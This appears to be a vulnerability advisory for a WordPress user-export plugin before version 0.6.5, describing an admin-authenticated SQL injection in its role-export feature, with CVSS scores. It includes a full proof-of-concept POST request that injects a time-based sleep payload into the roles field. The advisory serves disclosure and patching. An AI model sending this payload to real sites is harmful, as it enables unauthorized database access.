7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.
POST /wp-admin/users.php?page=uewm_settings HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591 Content-Length: 1309 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_roles[]” editor’%20AND%20(select*from(select(sleep(10)))a)+’ -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_use_custom_csv_settings” 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_field_separator” custom -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_custom_field_separator” = -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_text_qualifier” double-quote -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“uewm_custom_text_qualifier” " -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“save” Save changes -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“_wpnonce” 0c475bfd14 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name=“_wp_http_referer” /wp-admin/users.php?page=uewm_settings -----------------------------91314853327906118943368521591–
CPE | Name | Operator | Version |
---|---|---|---|
user-export-with-their-meta-data | lt | 0.6.5 |
7.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
HIGH
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P